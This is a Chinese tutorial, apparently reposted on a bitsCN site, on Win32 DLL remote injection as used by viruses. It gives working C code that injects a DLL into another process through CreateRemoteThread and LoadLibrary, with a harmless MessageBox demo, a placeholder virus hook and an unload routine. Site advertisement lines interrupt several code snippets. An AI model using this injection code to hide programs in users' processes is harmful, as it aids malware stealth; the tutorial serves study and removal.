DLL的遠端注入技術是目前Win32病毒廣泛使用的一種技術。使用這種技術的病毒體通常位于一個DLL中,
在系統啟動的時候,一個EXE程式會将這個DLL加載至某些系統程序(如Explorer.exe)中運作。
這樣一來,普通的程序管理器就很難發現這種病毒了,而且即使發現了也很難清除,
因為隻要病毒寄生的程序不終止運作,那麼這個DLL就不會在記憶體中解除安裝,
使用者也就無法在資料總管中删除這個DLL檔案,真可謂一箭雙雕哉。
記得2003年QQ尾巴病毒肆虐的時候,就已經有些尾巴病毒的變種在使用這種技術了。
到了2004年初,我曾經嘗試着仿真了一個QQ尾巴病毒,但獨是跳過了DLL的遠端加載技術。
直到最近在學校論壇上看到了幾位朋友在探讨這一技術,便忍不住将這一塵封已久的技術從
我的記憶中揀了出來,以滿足廣大的技術愛好者們。
必備知識
在閱讀本文之前,你需要了解以下幾個API函數:
·OpenProcess - 用于打開要寄生的目标程序。
·VirtualAllocEx/VirtualFreeEx - 用于在目标程序中配置設定/釋放記憶體空間。
·WriteProcessMemory - 用于在目标程序中寫入要加載的DLL名稱。
·CreateRemoteThread - 遠端加載DLL的核心内容,用于控制目标程序調用API函數。 blog.bitsCN.com網管部落格等你來搏
·LoadLibrary - 目标程序通過調用此函數來加載病毒DLL。
在此我隻給出了簡要的函數說明,關于函數的詳細功能和介紹請參閱MSDN。
示例程式
我将在以下的篇幅中用一個簡單的示例Virus.exe來實作這一技術。這個示例的界面如下圖:
首先運作Target.exe,這個檔案是一個用Win32 Application向導生成的“Hello, World”程式,
用來作為寄生的目标程序。
然後在界面的編輯控件中輸入程序的名稱“Target.exe”,單擊“注入DLL”按鈕,
這時候Virus.exe就會将目前目錄下的DLL.dll注入至Target.exe程序中。
在注入DLL.dll之後,你也可以單擊“解除安裝DLL”來将已經注入的DLL解除安裝。
模拟的病毒體DLL.dll
這是一個簡單的Win32 DLL程式,它僅由一個入口函數DllMain組成:
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved )
{
switch ( fdwReason )
{
case DLL_PROCESS_ATTACH:
{
MessageBox( NULL, _T("DLL已進入目标程序。"), _T("資訊"), MB_ICONINFORMATION ); bbs.bitsCN.com國内最早的網管論壇
}
break;
case DLL_PROCESS_DETACH:
{
MessageBox( NULL, _T("DLL已從目标程序解除安裝。"), _T("資訊"), MB_ICONINFORMATION );
}
break;
}
return TRUE;
}
如你所見,這裡我在DLL被加載和解除安裝的時候調用了MessageBox,這是用來顯示我的遠端注入/
解除安裝工作是否成功完成。而對于一個真正的病毒體來說,
它往往就是處理DLL_PROCESS_ATTACH事件,
在其中加入了啟動病毒代碼的部分:
case DLL_PROCESS_ATTACH:
{
StartVirus();
}
break;
注入!
現在要開始我們的注入工作了。首先,我們需要找到目标程序:
DWORD FindTarget( LPCTSTR lpszProcess )
{
DWORD dwRet = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof( PROCESSENTRY32 );
Process32First( hSnapshot, &pe32 );
do
{
if ( lstrcmpi( pe32.szExeFile, lpszProcess ) == 0 )
{
dwRet = pe32.th32ProcessID; bbs.bitsCN.com國内最早的網管論壇
break;
}
} while ( Process32Next( hSnapshot, &pe32 ) );
CloseHandle( hSnapshot );
return dwRet;
}
這裡我使用了Tool Help函數庫,當然如果你是NT系統的話,也可以選擇PSAPI函數庫。
這段代碼的目的就是通過給定的程序名稱來在目前系統中查找相應的程序,并傳回該程序的ID。得到程序ID後,
就可以調用OpenProcess來打開目标程序了:
// 打開目标程序
HANDLE hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
PROCESS_VM_WRITE, FALSE, dwProcessID );
現在有必要說一下OpenProcess第一個參數所指定的三種權限。在Win32系統下,
每個程序都擁有自己的4G虛拟位址空間,各個程序之間都互相獨立。如果一個程序需要完成跨程序的工作的話,
那麼它必須擁有目标程序的相應操作權限。在這裡,PROCESS_CREATE_THREAD表示我可以通過傳回的程序
句柄在該程序中建立新的線程,也就是調用CreateRemoteThread的權限;同理,PROCESS_VM_OPERATION
則表示在該程序中配置設定/釋放記憶體的權限,也就是調用VirtualAllocEx/VirtualFreeEx的權限;
PROCESS_VM_WRITE表示可以向該程序的位址空間寫入資料,也就是調用WriteProcessMemory的權限。 blog.bitsCN.com網管部落格等你來搏
至此目标程序已經打開,那麼我們該如何來将DLL注入其中呢?在這之前,我請你看一行代碼,
是如何在本程序内顯式加載DLL的:
HMODULE hDll = LoadLibrary( "DLL.dll" );
那麼,如果能控制目标程序調用LoadLibrary,不就可以完成DLL的遠端注入了麼?的确是這樣,
我們可以通過CreateRemoteThread将LoadLibrary作為目标程序的一個線程來啟動,這樣就可以完成
“控制目标程序調用LoadLibrary”的工作了。到這裡,也許你會想當然地寫下類似這樣的代碼:
DWORD dwID;
LPVOID pFunc = LoadLibraryA;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)pFunc,
(LPVOID)"DLL.dll", 0, &dwID );
不過結果肯定會讓你大失所望——注入DLL失敗!
那麼現在讓我們來分析一下失敗的原因吧。我是前說過,在Win32系統下,
每個程序都擁有自己的4G虛拟位址空間,
各個程序之間都是互相獨立的。在這裡,我們當作參數傳入的字元串"DLL.dll"其實是一個數值,
它表示這個字元串位于Virus.exe位址空間之中的位址,而這個位址在傳給Target.exe之後,
bitsCN全力打造網管學習平台
它指向的東西就失去了有效性。舉個例子來說,譬如A、B兩棟大樓,我住在A樓的401;
那麼B樓的401住的是誰我當然不能确定——也就是401這個門牌号在B樓失去了有效性,而且如果我想要入住B樓的話,
我就必須請B樓的樓長為我在B樓中安排新的住處(當然這個新的住處是否401也就不一定了)。
由此看來,我就需要做這麼一系列略顯繁雜的手續——首先在Target.exe目标程序中配置設定一段記憶體空間,
然後向這段空間寫入我要加載的DLL名稱,最後再調用CreateRemoteThread。這段代碼就成了這樣:
// 向目标程序位址空間寫入DLL名稱
DWORD dwSize, dwWritten;
dwSize = lstrlenA( lpszDll ) + 1;
LPVOID lpBuf = VirtualAllocEx( hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE );
if ( NULL == lpBuf )
{
CloseHandle( hProcess );
// 失敗處理
}
if ( WriteProcessMemory( hProcess, lpBuf, (LPVOID)lpszDll, dwSize, &dwWritten ) )
{
// 要寫入位元組數與實際寫入位元組數不相等,仍屬失敗
if ( dwWritten != dwSize )
{
VirtualFreeEx( hProcess, lpBuf, dwSize, MEM_DECOMMIT ); bitsCN全力打造網管學習平台
CloseHandle( hProcess );
// 失敗處理
}
}
else
{
CloseHandle( hProcess );
// 失敗處理
}
// 使目标程序調用LoadLibrary,加載DLL
DWORD dwID;
LPVOID pFunc = LoadLibraryA;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)pFunc, lpBuf, 0, &dwID );
需要說的有兩點,一是由于我要在目标程序中為ANSI字元串來配置設定記憶體空間,
是以這裡凡是和目标程序相關的部分,都明确使用了字尾為“A”的API函數——
當然,如果要使用Unicode字元串的話,可以換作字尾是“W”的API;
第二,在這裡LoadLibrary的指針我是取的本程序的LoadLibraryA的位址,這是因為LoadLibraryA/LoadLibraryW位于kernel32.dll之中,
而Win32下每個應用程式都會把kernel32.dll加載到程序位址空間中一個固定的位址,是以這裡的函數位址在Target.exe中也是有效的。
在調用LoadLibrary完畢之後,我們就可以做收尾工作了:
// 等待LoadLibrary加載完畢
WaitForSingleObject( hThread, INFINITE );
// 釋放目标程序中申請的空間
VirtualFreeEx( hProcess, lpBuf, dwSize, MEM_DECOMMIT ); 需要什麼來搜一搜吧so.bitsCN.com
CloseHandle( hThread );
CloseHandle( hProcess );
在此解釋一下WaitForSingleObject一句。由于我們是通過CreateRemoteThread在目标程序中另外開辟了
一個LoadLibrary的線程,是以我們必須等待這個線程運作完畢才能夠釋放那段先前申請的記憶體。
好了,現在你可以嘗試着整理這些代碼并編譯運作。運作Target.exe,
然後開啟一個有子產品檢視功能的程序檢視工具(在這裡我使用我的July)來檢視Target.exe的子產品,
你會發現在注入DLL之前,Target.exe中并沒有DLL.dll的存在:
在調用了注入代碼之後,DLL.dll就位于Target.exe的子產品清單之中了:
沖突相生
記得2004年初我将QQ尾巴病毒成功仿真後,有很多網友詢問我如何才能殺毒,
不過我都沒有回答——因為當時我研究的重點并非病毒的寄生特性。
這一寄生特性直到今天可以說我才仿真完畢,
那麼,我就将解毒的方法也一并公開吧。
和DLL的注入過程類似,隻不過在這裡使用了兩個API:GetModuleHandle和FreeLibrary。
出于篇幅考慮,我略去了與注入部分相似或相同的代碼:
// 使目标程序調用GetModuleHandle,獲得DLL在目标程序中的句柄
play.bitsCN.com累了嗎玩一下吧
DWORD dwHandle, dwID;
LPVOID pFunc = GetModuleHandleA;
HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)
pFunc, lpBuf, 0, &dwID );
// 等待GetModuleHandle運作完畢
WaitForSingleObject( hThread, INFINITE );
// 獲得GetModuleHandle的傳回值
GetExitCodeThread( hThread, &dwHandle );
// 釋放目标程序中申請的空間
VirtualFreeEx( hProcess, lpBuf, dwSize, MEM_DECOMMIT );
CloseHandle( hThread );
// 使目标程序調用FreeLibrary,解除安裝DLL
pFunc = FreeLibrary;
hThread = CreateRemoteThread( hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)pFunc,
(LPVOID)dwHandle, 0, &dwID );
// 等待FreeLibrary解除安裝完畢
WaitForSingleObject( hThread, INFINITE );
CloseHandle( hThread );
CloseHandle( hProcess );
用這個方法可以解除安裝一個程序中的DLL子產品,當然包括那些非病毒體的DLL。
是以,這段代碼還是謹慎使用為好。
在完成解除安裝之後,如果沒有别的程式加載這個DLL,你就可以将它删除了。